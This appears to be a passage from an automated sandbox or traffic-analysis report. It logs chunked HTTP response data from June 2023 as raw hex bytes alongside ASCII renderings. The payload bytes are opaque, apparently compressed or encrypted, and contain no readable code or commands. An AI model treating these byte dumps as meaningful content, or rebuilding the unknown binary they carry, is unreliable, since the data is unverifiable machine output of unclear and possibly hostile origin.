                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC433INData Raw: 32 30 30 30 0d 0a de 9e 15 01 84 83 9a ce 33 e7 0b 7f 77 96 8b 16 33 bd b3 6e d7 03 82 8e 97 21 a3 f0 aa 9e 84 64 07 fd bc 88 d6 83 e6 79 8f 4e 6f 6f 04 7b 03 81 0d c0 11 01 ef b7 5d af 2c 83 60 6a 70 27 2a 43 78 05 5d 4f 38 de ea 05 5b 64 48 84 1b 52 ab 26 ee af 60 19 52 a2 4f f3 d6 6e ee ba ee c8 0b e6 5f 77 f9 cc 2c c0 90 c3 54 2a 1e 81 82 66 17 60 48 a9 78 92 57 b0 6b 95 cf 5e 98 e9 9b 97 20 36 21 5c 9b a7 8f 9e 42 c6 8d ad 96 f5 7c 8b bc a3 e2 51 e9 5e 10 65 61 97 3f 9e 19 d5 d0 d8 ad 01 34 3a 75 a5 f1 14 c1 69 93 77 bc 0f 25 60 b9 5f 18 89 99 2d 72 87 fb da ed 64 d5 55 8d 86 26 71 2e e5 3a cd 1a 7b 24 bd f0 73 bf 77 f4 1b 73 7c 38 2d 3c 45 78 b5 39 49 f5 44 3a 43 b1 ad d7 bf 22 9a 69 99 4c aa 96 6b 42 9b a3 89 b3 f6 56 b4 b4 73 e9 53 92 14 9b e4 70
                                                                                                  Data Ascii: 20003w3n!dyNoo{],`jp'*Cx]O8[dHR&`ROn_w,T*f`HxWk^ 6!\B|Q^ea?4:uiw%`_-rdU&q.:{$sws|8-<Ex9ID:C"iLkBVsSp
                                                                                                  2023-06-21 18:24:31 UTC441INData Raw: 78 db 44 00 bd c1
                                                                                                  Data Ascii: xD
                                                                                                  2023-06-21 18:24:31 UTC441INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC441INData Raw: 32 30 30 30 0d 0a 2c 7a 53 76 8f 0c 22 23 3a 75 b0 8e f4 d6 06 e4 a6 ec 69 77 9f c7 da fa 8f f4 3b 4a 73 af a3 fd 72 c8 2d 92 72 5d aa 13 c7 02 d2 42 7e a2 35 8a f6 0a 0a 24 32 0a 77 97 86 23 9b 0e 47 ce 2d 51 f6 14 cf 84 f3 d3 f0 8b e1 ff d9 5d da a6 2f fc 79 b8 10 c7 d4 9a b6 45 38 d3 2e b3 73 1e 21 39 90 60 9d 9a 33 4d 71 32 df f4 dd 73 ec 8a e7 9c a6 de 85 29 9d 5a d0 ef 46 a2 05 6e 54 e1 b4 e0 8c ca 67 14 65 49 bb 1e b6 e6 64 63 bd e3 7d 75 bf 98 4e 1b 38 1a 81 45 bd c9 f9 ec 88 01 d3 7d d4 e0 57 21 e5 43 c5 76 bb ee e9 35 39 69 d0 1a 3f 7a 3a 6f e1 4f fa 47 96 cb bc e3 fb af 42 58 3c 5d 8b d5 91 92 89 72 67 bf e6 51 f5 3c 8c 8f c5 23 cb 7b b9 ce 65 95 cc 71 c8 65 aa 01 b0 23 be d3 3c 61 3b e9 a9 eb bb 66 a3 ed 0a 40 33 8d 38 10 e3 12 ce a9 9e 92 58
                                                                                                  Data Ascii: 2000,zSv"#:uiw;Jsr-r]B~5$2w#G-Q]/yE8.s!9`3Mq2s)ZFnTgeIdc}uN8E}W!Cv59i?z:oOGBX<]rgQ<#{eqe#<a;f@38X
                                                                                                  2023-06-21 18:24:31 UTC449INData Raw: 9a bb 1d 5e a7 a5
                                                                                                  Data Ascii: ^
                                                                                                  2023-06-21 18:24:31 UTC449INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC449INData Raw: 32 30 30 30 0d 0a 81 84 7a 94 82 a2 72 62 09 85 ae b6 3f bb 50 23 b0 b7 e2 31 fa 9e 5d f5 d0 b7 e7 87 fe 89 4d 23 d7 32 4f 00 6c 74 1f c9 28 18 d7 81 d1 9b 28 07 97 58 d8 a4 8e 27 08 d3 01 76 49 98 e0 72 50 74 b4 cf 4e 96 a8 a0 f5 38 37 94 a2 08 1c 41 29 39 3c fb 36 81 23 d3 0e b4 f2 fc e2 3a e4 d2 fc ca d2 b6 08 e1 a1 e0 c1 f4 9e e4 b1 93 49 fe 46 b5 54 c2 9f bb 51 91 b9 5e b2 9f 3d 3f 9b 09 8e 78 ff 68 c7 d2 a4 d1 47 30 37 07 e4 81 98 cf f4 2f 4e 78 20 13 39 eb e5 60 a4 fe a6 61 82 68 11 10 2b 0c 11 88 97 f7 2a 84 8b cf b5 6f eb 68 cc 22 b5 15 a7 17 49 05 30 4b 35 a1 7a 8d ae 62 8b 89 0a 7a 07 32 9d d0 b1 43 f5 f9 47 e9 68 64 e3 3c 12 19 26 63 82 d7 bd 1d 28 86 04 22 47 1a fa 41 08 35 ef 1f ee 2e 9c de 4b 0a 5f 66 6a 3d 0c 44 54 2b 23 11 f3 a1 a5 e4 d0
                                                                                                  Data Ascii: 2000zrb?P#1]M#2Olt((X'vIrPtN87A)9<6#:IFTQ^=?xhG07/Nx 9`ah+*oh"I0K5zbz2CGhd<&c("GA5.K_fj=DT+#
                                                                                                  2023-06-21 18:24:31 UTC457INData Raw: 63 65 fc e1 d1 d6
                                                                                                  Data Ascii: ce
                                                                                                  2023-06-21 18:24:31 UTC457INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC457INData Raw: 32 30 30 30 0d 0a 25 05 91 62 a5 7f 4f f5 27 d4 72 c7 f2 ac 10 6b 9f 21 6e a8 36 31 4d 39 69 93 31 5e a4 4b 36 c5 33 9a 6e 36 3a 0d c4 33 c2 b8 92 2c 7c 8c c5 cc fb 7f b3 9b 0d 2f 8f 80 ed 94 69 91 34 1e 4b 14 3e 69 e4 7e 40 29 66 77 fe 2d fe 70 6b 67 61 7b 06 52 0b e8 d8 75 4c 5b b3 0d 84 d2 52 45 cd fc 8b 0c 53 01 b6 24 a5 44 91 c3 d8 32 a5 9f db b6 27 55 96 c8 7b 94 33 5b 9e 41 31 d3 55 fb 68 51 7e 7f df d2 a6 34 ca 0d 3b 50 c6 df 0d 8c 93 ad 75 1f bc 19 1e f9 ec ff a1 63 eb cd 0e d0 f7 4f 72 7f 1f 14 93 d8 84 3c ec 65 f1 66 71 99 25 71 d7 83 4a e5 df 9b 2e ec 16 85 5f 9c fb e8 6d d7 13 55 7c 25 79 f0 5d 77 b4 73 84 1e 27 e4 21 86 9f 06 90 c8 04 63 04 28 5a 31 8d 73 14 93 e2 65 9b ec 75 3d 61 5a 31 f6 e0 99 84 53 fa ac e7 2d 6a c7 8d e3 18 9f 11 e4 57
                                                                                                  Data Ascii: 2000%bO'rk!n61M9i1^K63n6:3,|/i4K>i~@)fw-pkga{RuL[RES$D2'U{3[A1UhQ~4;PucOr<efq%qJ._mU|%y]ws'!c(Z1seu=aZ1S-jW
                                                                                                  2023-06-21 18:24:31 UTC465INData Raw: 27 ae f2 22 22 2d
                                                                                                  Data Ascii: '""-
                                                                                                  2023-06-21 18:24:31 UTC465INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC465INData Raw: 32 30 30 30 0d 0a f6 48 69 e5 8d 83 cc e9 10 3a 05 fd d6 4d b2 85 02 1f d3 fe 5c c2 ae ff 35 bb a7 4e 9d 61 40 70 a6 d4 cd 1f 32 8c 7e f7 e8 d6 c8 44 72 6f 42 45 06 ca 8a 2b 01 f7 d9 ff 3c 75 a4 dc 94 c7 d5 87 50 d7 41 a6 2f 4d bd d0 96 dc 65 f2 38 ef 43 c0 2b ec 08 e9 26 05 be 3a ab d4 3f 73 3f eb 38 55 ae 82 42 f5 9c 8c bc 87 e7 c3 d6 b3 94 5f 5a 15 52 35 57 cd 25 63 76 59 c4 bb 9f 79 ad 19 59 31 98 de d3 f0 59 2d bf 84 2d 13 db 4b 81 6e a0 42 e4 f7 7b 7c 1c 90 a8 7e 20 24 4a 0c 9f ab e7 5d 7a 5d c3 e7 4f 34 14 8f 92 b8 ae e9 11 30 51 f9 56 e9 b0 9d 3c a7 89 bc 19 fc a0 01 5e 7b 13 56 53 b0 8b ff 3f 53 86 5b 39 67 5b b7 0c 75 e0 64 08 40 a0 90 92 17 31 db 54 a7 20 3d 76 bc 8b d1 ba 50 3b a8 b5 b5 a5 6c 41 0e c7 08 3e fd 8f b3 10 6e 0e 17 65 38 ab e2 dc
                                                                                                  Data Ascii: 2000Hi:M\5Na@p2~DroBE+<uPA/Me8C+&:?s?8UB_ZR5W%cvYyY1Y--KnB{|~ $J]z]O40QV<^{VS?S[9g[ud@1T =vP;lA>ne8
                                                                                                  2023-06-21 18:24:31 UTC473INData Raw: 95 65 67 2b 81 54
                                                                                                  Data Ascii: eg+T
                                                                                                  2023-06-21 18:24:31 UTC473INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC473INData Raw: 32 30 30 30 0d 0a bc 7c 87 28 7a 26 49 81 e5 84 dd 2f bd c8 d6 3a 19 3d 26 bf d1 cb 01 b1 24 2a 63 8a 6e 3e 05 c8 69 56 8e b9 68 e4 8e 32 e2 2d bc f1 fc cf 19 b3 c6 dd 47 5c 4b 5f 03 c9 a7 a2 28 e0 7d ed 76 f7 06 af 0c 9c 4a 02 c3 89 43 7f d4 e1 64 1a 8e 3b 05 43 a5 8d 87 40 9c f6 79 bd d1 94 c8 0a b1 54 00 bf 14 4f 52 47 e4 33 4a 04 df 05 8f 35 a6 7a 1e 72 8d f9 4e 9d 09 07 5d ef 22 7d ad 0d b4 df 3b 43 9b b0 fd ce 32 5e 3c bc 0e ac f1 c5 ca ce 87 82 a4 93 db 01 f2 5d 4d 7b 14 24 21 85 4e d6 78 2f cc a6 90 98 2f 5f 13 ec 77 3b 5b ba 13 90 f7 e8 15 ab 20 6a 64 55 06 bb 58 c4 7f 15 e1 1f 45 c0 e2 68 23 f7 3b 52 8a 44 54 e3 a4 a1 de fd 37 ef f8 19 82 8a b6 79 15 de 6f 16 e3 7b 3a b9 d7 da d8 05 31 c0 76 a4 23 10 87 bb 03 8c c0 9d 90 66 33 ab 2b 16 0a 07 cc
                                                                                                  Data Ascii: 2000|(z&I/:=&$*cn>iVh2-G\K_(}vJCd;C@yTORG3J5zrN]"};C2^<]M{$!Nx//_w;[ jdUXEh#;RDT7yo{:1v#f3+
                                                                                                  2023-06-21 18:24:31 UTC481INData Raw: c0 3a 23 eb ed a2
                                                                                                  Data Ascii: :#
                                                                                                  2023-06-21 18:24:31 UTC481INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC481INData Raw: 31 66 66 38 0d 0a c9 61 35 50 e4 db 72 89 c0 a5 84 d0 65 71 c4 d3 69 84 65 1b 85 03 dc 29 b3 77 b6 0f 39 35 a3 6e 97 ab 58 69 be a3 80 14 24 b8 27 d9 47 eb 5f 8f b0 7f bc cd b6 3a e9 fa 2b c5 bf f4 13 0e e9 5d 65 f8 72 a6 df a9 85 6a 99 cc 66 14 61 7e 65 7a ac 45 e8 09 72 a0 1f 41 80 a6 6f 2a 17 69 03 de de 3b a8 21 1e b4 0c db 6a 9e 75 83 8e 74 db 8d 63 92 fa f2 cb 23 15 b8 78 b7 8c 9e 4e 92 3a 9d 2b fa c2 09 cb b6 af 17 4f ed 54 c1 ea c9 bf 43 a3 3d 41 45 85 80 e2 e1 89 32 6b ac 8c e9 97 1a 97 b1 12 96 cf 1e e0 f5 f5 e5 e2 2a d5 6b 3d 41 80 3e 7f 63 16 cd 3b 13 8b 5c 80 06 ae a0 b7 f8 79 93 e5 74 bf 2a 92 08 a4 17 5d 21 be 9a 06 93 34 e2 00 07 02 7f 03 6a 4c 6d d2 39 2a ad e4 3c 49 f0 6b c1 5a 97 ea c3 0b d9 db 15 80 91 7b 4c f8 3b 84 e6 ac 87 85 7e 92
                                                                                                  Data Ascii: 1ff8a5Preqie)w95nXi$'G_:+]erjfa~ezErAo*i;!jutc#xN:+OTC=AE2k*k=A>c;\yt*]!4jLm9*<IkZ{L;~
                                                                                                  2023-06-21 18:24:31 UTC489INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC489INData Raw: 9f 11 cc 97 16 80 fd c0 08 d1 bd 88 7c bf 12 d0 04 f1 71 87 a3 c4 83 be 20 1b 5c 60 d6 ad 43 b2 0b 3d 82 09 e1 62 d7 f9 b0 98 48 d3 67 f4 c9 03 bd ad a3 a2 a5 19 05 3e 79 d1 db dd 11 6f 48 63 19 9b 5b bd 0f 3e bd 8d 53 56 ff d4 df 28 c3 7c f9 8b d9 3e ae 89 40 be 91 95 8a 3b 5a 34 06 1f d1 86 80 a2 a4 61 a0 78 3a f4 35 24 ee fe 0e 0a f5 af 0a 7e d1 d1 4a db 3d 45 0a d2 3c 58 25 68 41 66 f2 4b 9f 6a 19 a0 b0 a9 84 65 14 4d 8f fe 6a a4 18 a0 c2 19 79 f3 6f 41 05 6a 9f bf 4f 4d 0a 19 46 04 de c2 df 02 e5 24 f3 21 ab e1 f4 ca 3e cd 82 d6 84 9a 9b a5 fb d2 93 bb 8c b7 b9 9d 38 dc a4 f2 c4 08 3a 19 a0 22 9a 2f 80 72 4c 0a ca 8b e4 6c 72 34 0d 4f 92 cf c4 4f 49 d4 d6 2a ae 48 74 88 1e 7a 65 4d 88 23 9d 6f d0 a8 00 53 a7 8f 88 a7 75 c8 87 e4 10 1e 9a f4 6f 48 a8
                                                                                                  Data Ascii: |q \`C=bHg>yoHc[>SV(|>@;Z4ax:5$~J=E<X%hAfKjeMjyoAjOMF$!>8:"/rLlr4OOI*HtzeM#oSuoH
                                                                                                  2023-06-21 18:24:31 UTC497INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC497INData Raw: 32 30 30 30 0d 0a 41 03 e1 43 50 5a 04 4d df f2 63 00 bd df eb cb cb 6b 84 2b fd 1c 8f 16 04 bb bc 39 5d 07 bc d6 45 2f 06 d9 4f 76 12 7e a6 62 71 2a a3 9b c5 12 d7 f1 a7 99 5f ea 9c ae a9 fb ae d3 59 98 d4 85 d1 2c 2e e4 0b 24 73 47 2a 73 28 b7 74 66 eb c9 26 ee eb 35 13 12 30 ce a3 ed b9 c0 90 22 c3 f3 00 29 f4 78 a4 5b e1 3b 5e ba 5b df 42 70 e0 e0 6c 5e da 10 40 f1 8c 13 ef 44 08 65 73 52 c6 51 2a 28 c9 0c 57 30 f9 23 36 f8 75 60 10 27 f0 07 ce aa 9b cf ca 2a 3b d2 51 e8 08 c7 52 bd 5f a2 e8 9b 3d 0d 96 51 03 fa 8d d8 a6 77 85 ff 47 2d 17 57 b8 6b ff 93 d4 97 dd c9 8f 02 94 58 de c3 fc 5d 83 de 14 89 c9 64 36 5b a3 58 75 10 51 c9 70 49 a6 f8 7b 62 6a 20 42 d4 c4 0b 8e b2 fb 62 a5 65 e2 fa ae 1c 5f b9 91 29 33 6d cb df 76 82 96 2d f4 2a 6a c9 de 01 0c
                                                                                                  Data Ascii: 2000ACPZMck+9]E/Ov~bq*_Y,.$sG*s(tf&50")x[;^[Bpl^@DesRQ*(W0#6u`'*;QR_=QwG-WkX]d6[XuQpI{bj Bbe_)3mv-*j
                                                                                                  2023-06-21 18:24:31 UTC505INData Raw: cf 1b c8 41 00 dd
                                                                                                  Data Ascii: A
                                                                                                  2023-06-21 18:24:31 UTC505INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC505INData Raw: 32 30 30 30 0d 0a 92 eb 57 89 ed 16 8f cb 32 4f 67 4c 18 fa d3 88 eb 69 b6 fe 48 6f 28 9d 71 9a ca 21 9d bc 56 55 e6 0a 27 1c e3 03 43 e3 93 93 19 21 22 5e 80 42 a8 c8 9c bc 07 a5 c5 30 02 2b f5 e4 6d 21 7a e2 ad 4a 43 d8 5e e9 1a 19 ec 69 b3 1b 6f 7e ce 3b e3 e5 20 6c 62 09 ee 96 eb 80 cb 82 92 e1 48 ce 53 a0 ef 19 cc 31 fc 95 11 6c e0 c3 81 e4 ff 1c 8c 42 44 d6 ae bb 79 b6 9e 19 d1 99 55 aa b3 20 72 4b 0d cc f7 7d 38 d4 1f 7b 40 45 a0 dd 5d 0c c5 a3 e9 b8 46 a2 0d a9 2f ca e8 6d 9a 01 0d e6 7a 5a 37 62 06 f5 15 b0 91 66 36 7d 8d a8 af c6 3e 38 63 20 8e 4c b2 27 a3 83 00 2d a1 cf 09 1e 07 b7 02 a8 d4 7e b5 45 33 c9 d5 bb a4 63 a8 07 89 bf e3 f3 4c 04 0c 31 7e d7 a8 45 87 8a 1f 7c d0 19 c4 4f 1d 18 d9 de 15 2c f3 02 ba 38 21 db e7 68 63 49 3a fd 45 ab 34
                                                                                                  Data Ascii: 2000W2OgLiHo(q!VU'C!"^B0+m!zJC^io~; lbHS1lBDyU rK}8{@E]F/mzZ7bf6}>8c L'-~E3cL1~E|O,8!hcI:E4
                                                                                                  2023-06-21 18:24:31 UTC513INData Raw: 7a ac 43 2a 38 af
                                                                                                  Data Ascii: zC*8
                                                                                                  2023-06-21 18:24:31 UTC513INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC513INData Raw: 32 30 30 30 0d 0a 95 8a 7f b3 63 0c 33 32 59 68 ad cb 43 45 27 7c 06 a5 d7 2b dd 29 04 b2 ff e3 5b b5 65 b8 4b 46 db db 42 5e 6e e0 a7 d9 f7 f8 62 89 b2 f5 ac ed a9 17 d1 27 2a 58 ed 66 a7 65 3e da bd 82 a1 14 51 a2 04 07 9a 0a 20 f7 8c 1e 83 9a ee ce a7 be 82 9c 08 db 5f 67 6a d1 5b a5 49 d7 f8 c0 44 e8 8a 66 9e 12 6d 5e 96 ef 04 3a 5a 0a f7 49 ec cb 23 4f fe b9 58 93 d1 22 cd 0d 3d ef 3c e3 d4 21 aa f6 6a 31 b1 fa aa cc d7 c0 71 4a db 92 e4 c1 70 64 04 07 84 69 70 7d 5e 06 a9 e7 da d9 a6 de 2e 30 ad 96 45 f5 8b 51 73 30 7f 45 c0 b8 c7 f9 c9 60 c6 77 44 47 80 51 02 96 20 be 65 19 7e 42 8c 90 5c df 7c b4 eb c1 2d 73 37 19 61 e7 98 5a 30 74 75 23 da bb 47 1c 23 10 34 9b a4 5e 47 6a e2 af c1 ff 19 1b eb ae 16 ca 9c 5e 09 97 bb 51 7d c2 59 83 ee ef 1f 6d ed
                                                                                                  Data Ascii: 2000c32YhCE'|+)[eKFB^nb'*Xfe>Q _gj[IDfm^:ZI#OX"=<!j1qJpdip}^.0EQs0E`wDGQ e~B\|-s7aZ0tu#G#4^Gj^Q}Ym
                                                                                                  2023-06-21 18:24:31 UTC521INData Raw: f6 0d b9 a9 9b 4c
                                                                                                  Data Ascii: L
                                                                                                  2023-06-21 18:24:31 UTC521INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC521INData Raw: 32 30 30 30 0d 0a d3 56 ae 39 d4 fe b1 0f 46 30 a6 ff b4 88 8e cc 36 17 75 93 07 f9 ac ae a2 29 cd 0f 4e 79 86 82 d9 78 bf b6 9a 91 97 fb 2b 8e ad 45 b2 e8 4f af c5 25 0e 2c 4c 26 dc 43 f3 28 18 01 6e 09 cc f6 59 47 cc e9 30 20 7a e8 af 33 ac 84 9f 03 81 f7 df ee fc c2 cc c7 99 54 b9 d8 9f 74 58 61 ea 7e 47 96 0e 03 45 6b e3 2c 19 d8 87 04 4b 30 99 6b b1 76 06 a3 4a 45 9a 89 22 a1 38 20 90 1d 2d 3b 76 ff b7 72 50 ae d5 01 63 de 4d ac d6 a5 fd 01 71 56 69 21 94 5b e8 fd 2c 65 2a f3 df 31 92 84 bd 5a 9a 04 74 4a 74 bb c8 8c ea 6d 10 e0 0f 0f df 9d 39 00 34 eb 72 01 02 77 4e bb 96 bc 4b 22 98 1a 47 b9 e1 52 37 90 cb 63 93 89 83 22 00 a6 6f 95 44 a1 c5 ac 47 32 8f 85 98 cc 2e a8 6c 48 0c 37 27 3c 78 c4 cb fa ac d9 2e 67 ad ca b5 55 ca 44 40 b1 05 45 47 f9 e0
                                                                                                  Data Ascii: 2000V9F06u)Nyx+EO%,L&C(nYG0 z3TtXa~GEk,K0kvJE"8 -;vrPcMqVi![,e*1ZtJtm94rwNK"GR7c"oDG2.lH7'<x.gUD@EG
                                                                                                  2023-06-21 18:24:31 UTC529INData Raw: df 71 06 ad 61 76
                                                                                                  Data Ascii: qav
                                                                                                  2023-06-21 18:24:31 UTC529INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC529INData Raw: 32 30 30 30 0d 0a c8 a2 16 3c be 7e 02 58 2e 8b 20 54 77 29 76 5a 93 dc e4 32 3d 8b db b4 e6 68 30 6a da 15 41 c5 2c 02 94 11 77 f3 a9 1a be ee 27 95 10 08 d1 2a 47 9e 32 9e 08 f3 5e 2e 8e 42 ee 7c 7f d4 2b bf 09 77 f2 86 27 36 6f 58 3d c7 22 2a 65 9f a7 ee c3 67 ae b8 34 fd 9b de 6f c3 6a 82 49 44 1f 5e 99 0e 9f af 87 4a 35 89 d0 40 8d bf b1 be 19 78 ab f5 a2 08 03 d7 87 db f7 bc 42 9b d3 fa c1 85 8f 9c d7 41 46 6a 49 58 c6 c4 39 ea b2 95 c3 7b 7c e5 ae 1b 0e e6 0f 9d 83 c7 be 84 43 39 50 bd 5b 5f 07 8e 97 7a 99 e9 d1 59 d7 ee 87 7f 3e bb 7d ab 2f ac 00 c3 98 ac c9 82 b1 a7 8c 1d 7d d4 f8 41 28 02 1c 98 de e5 71 c8 43 43 1f 34 8b cd 04 52 d6 0f 28 4e 34 0a 47 0f d9 19 b0 22 2c f4 1e 3d 53 6a 76 01 c9 62 77 65 cb 8b 14 c1 c3 79 40 0b c5 bc a1 a5 11 4a b0
                                                                                                  Data Ascii: 2000<~X. Tw)vZ2=h0jA,w'*G2^.B|+w'6oX="*eg4ojID^J5@xBAFjIX9{|C9P[_zY>}/}A(qCC4R(N4G",=Sjvbwey@J
                                                                                                  2023-06-21 18:24:31 UTC537INData Raw: 4c d1 cd c7 04 da
                                                                                                  Data Ascii: L
                                                                                                  2023-06-21 18:24:31 UTC537INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC537INData Raw: 32 30 30 30 0d 0a e4 91 7c 4f ff 11 55 dd 34 2a a6 7a bd 43 0b 90 5f 7d f3 cb b4 5f 2c 6c 7c ba b4 c9 60 37 0f 2f 69 60 59 9d 4f b4 d7 43 9b 97 1c 96 f3 e8 5b 29 a2 ed 69 18 63 97 b7 ce 26 3c 0c 9f 58 30 7c 98 24 ac e4 4a 61 52 2a d3 63 5b d1 00 3b a3 63 71 49 04 9e f7 3b 8a 8b b9 5b 6b 07 7d f5 c2 13 77 01 33 d9 60 80 6b 3b 1e 2f 3b 4c 9c 7f 42 31 fc c4 9a 81 08 89 67 91 0c 83 d7 1d 33 cb fc 7f 70 4d a5 18 97 41 d3 71 ca 0c 91 48 3b af 2b c4 94 af 1a fc 3c bc c5 77 f9 2d 80 97 1c 93 f0 38 6a c1 4f 7c b1 93 b7 8a 79 eb a0 31 6f a4 96 2a 9c 8a 6a 5a 37 31 d0 9b 88 20 22 ce eb 51 df fe d3 23 06 99 93 8e 10 c9 0f ba a6 59 0a 85 3b 07 30 04 20 eb e3 92 46 0a 64 81 ae 99 c1 dc d5 5a ce 25 c8 8d cd fd 11 ba 90 01 c8 ec 61 de d2 d9 7c 13 0a ea cd 98 76 a9 c0 5d
                                                                                                  Data Ascii: 2000|OU4*zC_}_,l|`7/i`YOC[)ic&<X0|$JaR*c[;cqI;[k}w3`k;/;LB1g3pMAqH;+<w-8jO|y1o*jZ71 "Q#Y;0 FdZ%a|v]
                                                                                                  2023-06-21 18:24:31 UTC545INData Raw: f3 72 a9 35 b6 2e
                                                                                                  Data Ascii: r5.
                                                                                                  2023-06-21 18:24:31 UTC545INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC545INData Raw: 31 66 66 38 0d 0a a3 74 de 9e d0 37 67 dc 59 c7 b9 b6 84 f4 de 4c 71 8d 3c bb b5 1c 80 50 d5 8e 5c 1e b0 11 4d 3b 74 14 ac 73 6c 49 41 96 25 0e 22 a2 72 bf 9f a7 8b e1 de ad bd 96 25 6d 99 f6 e0 18 cd 5e 5d 55 fb e6 a4 93 f0 6d dd d5 2f 5e 2d 25 ef a5 05 ab dc 9d ee c6 4b 7c 4f 80 c9 51 1f 09 f3 99 c1 af 90 07 54 e5 14 e7 2d ac 87 e8 ff 53 fc 98 2f e9 3e 48 55 d2 cd 32 75 28 08 4a b2 bd ff 41 30 1b f4 5c 5a 43 ab 81 03 67 b6 b1 cc 1d 94 96 c3 4c d0 85 a3 4c 2e 45 8c aa ce c0 8e 97 f7 43 8a 15 fb 1b 05 44 7e 01 2c 72 b6 30 fc b6 7b 71 58 bc e9 b2 e4 d2 89 c0 92 5e 2c 9f bb e0 19 19 bc fc f2 25 27 02 9f 17 c9 93 54 10 65 9b c7 a4 08 c7 55 35 d4 dc 8f 25 e6 26 61 22 f7 4c f4 a0 f0 f5 fa b4 e3 cb 40 08 ad 97 10 ee 0a 62 99 70 23 52 f1 ba 19 44 40 f1 00 f6 82
                                                                                                  Data Ascii: 1ff8t7gYLq<P\M;tslIA%"r%m^]Um/^-%K|OQT-S/>HU2u(JA0\ZCgLL.ECD~,r0{qX^,%'TeU5%&a"L@bp#RD@
                                                                                                  2023-06-21 18:24:31 UTC553INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC553INData Raw: 5f 2e 69 a7 70 d4 44 47 21 d5 4f d5 23 be 11 03 bf 18 41 8e b3 ea 3a fa 3b 09 81 3f 0e 2b 78 3f 8a 9d f7 94 74 1f 13 2c 7a 2f fc 2c 25 85 da e2 10 98 86 5a 09 96 a6 59 5e 15 d3 fa 73 49 17 81 94 56 61 65 b2 a4 bc 26 d7 e3 3b dd 0d 7e 38 e9 f4 b3 7a e9 2e 74 00 30 71 8b 3a 7f c6 ba a4 90 68 ce 37 36 4f 0b 9c 3e 8d 9f 6d e2 96 04 57 fb 03 1d 4e 4f 89 bc e0 6b d0 4d 5e cb 1a db a1 22 37 ad 1b fd ef ca 00 98 f8 d5 52 a6 bf a8 e6 09 a4 55 18 17 93 b8 62 ff 26 22 c7 81 43 87 be 3d fb 10 2f fc eb 44 9d c1 4f 9e aa 6d 65 9b ca de 59 e7 9c ec 4d 30 cd 49 a3 39 5f 42 8b 76 e2 92 f1 3f b3 39 fa e3 83 00 b6 9c b0 7d 40 84 39 ae e9 f6 7e a3 27 c5 5f 16 65 41 0e 84 19 92 69 e7 09 e5 23 d6 71 23 07 fe 2d c3 d1 6b d5 26 a4 83 e9 d2 97 fe 55 e6 5b 95 9b b2 7f 97 f6 ae 5a
                                                                                                  Data Ascii: _.ipDG!O#A:;?+x?t,z/,%ZY^sIVae&;~8z.t0q:h76O>mWNOkM^"7RUb&"C=/DOmeYM0I9_Bv?9}@9~'_eAi#q#-k&U[Z
                                                                                                  2023-06-21 18:24:31 UTC561INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC561INData Raw: 32 30 30 30 0d 0a 0e 75 f2 68 64 8b cd a6 a8 40 d5 b6 39 bc 93 49 a8 4b e0 c9 6b 98 5e 7b e1 e0 74 e3 9f ac e7 6a ff 93 5b 55 bd 1c b2 38 12 e0 75 89 d8 e4 3c 0d dd 8b 6d d8 5b 96 bb c0 81 c6 23 bf 2a 60 ee d6 e5 d4 bf 99 a1 31 ec 17 2a 7d a5 df b4 16 e9 e7 06 57 f4 0b d4 0d 12 c7 5c 1e 7f 23 7d ce ee 3e 5e c3 b7 ca 1f 54 46 14 eb 80 00 fb a0 49 c2 d9 ce 96 59 8e 8a b7 16 95 4f 46 fb 32 ac 6b 69 af ab da c9 b3 48 de 5c 76 39 81 f9 32 81 80 fc 57 37 31 b2 e5 5a ad 35 7f a2 7f d1 0d ae ce 0a c7 ce f7 9d b0 d6 26 6d ec 69 0b 63 88 aa 4c 59 80 70 a6 1b 64 64 b4 dc e4 6f da 8f 5c f1 bd 4a 91 cd ce 07 d2 28 bb a8 6c 26 a6 d4 f3 43 9c 05 97 f7 15 41 24 8e 20 97 46 aa 6c 1b 10 b1 d3 35 f4 0e 6d ab 7b 79 f1 83 d8 c7 3c 1a c4 56 20 fc bb e4 8c f0 9e 27 b7 c8 6f af
                                                                                                  Data Ascii: 2000uhd@9IKk^{tj[U8u<m[#*`1*}W\#}>^TFIYOF2kiH\v92W71Z5&micLYpddo\J(l&CA$ Fl5m{y<V 'o
                                                                                                  2023-06-21 18:24:31 UTC569INData Raw: a6 fa 21 c0 ea bc
                                                                                                  Data Ascii: !
                                                                                                  2023-06-21 18:24:31 UTC569INData Raw: 0d 0a
                                                                                                  Data Ascii:
